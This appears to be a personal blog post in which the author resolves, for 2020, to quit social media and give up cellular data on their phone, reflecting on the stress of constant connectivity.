I am convinced that the concept of Social Media is inherently flawed. This realization has been percolating in my mind for quite some time. Regrettably, I found myself succumbing to the addictive nature of these platforms, only to conclude that they do not contribute a net positive impact on my life, both personally and publicly.
Tried to quit social media in 2019. I failed.
In 2020, I’m embarking on another attempt at redefining my online presence. While I bid farewell to Social Media, I must note that my departure from these platforms doesn’t equate to a complete disconnection from the digital realm (yes, I still hyphenate that word). I will maintain accessibility through email, both the traditional Internet version.
Anticipating a spectrum of reactions, some will assert, “Impossible!” while others will confidently declare, “So easy! I already do that!” There might even be a handful lurking in the corners of the globe, crafting random mean or snarky remarks on X. The beauty of it all? I won’t be privy to any of it. So, feel free to snark away — it’s all good from my perspective.
Honestly, I’m guessing I won’t be the only one with such a resolution for 2020… here’s hoping we all succeed.
As my second New Year’s Resolution, I’m taking a decisive step by discontinuing cellular data. This means bidding farewell to smartphones equipped with ever-present Internet connections, be it an iPhone with 4G, an Android phone with 5G, or even a Linux-oriented phone boasting a speculative 17G connection (or whatever G designation they decide on by the close of 2020).
I find modern smartphones’ “always connected” nature to be stress-inducing and negatively impacting my quality of life. While there are certainly some benefits… the negative aspects of being constantly connected are simply too strong. I’ll still let myself have a phone. But my phone… will just be a phone. When I’m walking around town, I have no Internet connection. I’ll be offline without sitting at my computer (“In the real world”).
Maybe I’ll have two devices: one PDA (I’m bringing that acronym back) and one phone. Perhaps I’ll settle on a single PDA-Phone (just without any 2G/3G/4G/5G/whatever connection). I haven’t decided on that part yet.
Thus far, things have gone relatively smoothly. Over the coming days, I’ll keep my smartphone turned off and see if any problems crop up. I’m sure there will be some inconveniences — we’ve all gotten so used to smartphones with always-on data connections — but I am anticipating, based on how it has gone so far, an overall positive experience leading up to January 1st.
Does anyone expect to be on their deathbeds and have their final thought be, “Darn, wish I would have liked a few more things on X?” Or, “I wish I would have spent more time surfing the web on my cell phone while at dinner with my family?”
Will these changes positively impact my life and overall happiness (which is already pretty high, but why not shoot for even better)? Will any inconveniences crop up that are insurmountable? Will I experience gains (or losses) in productivity?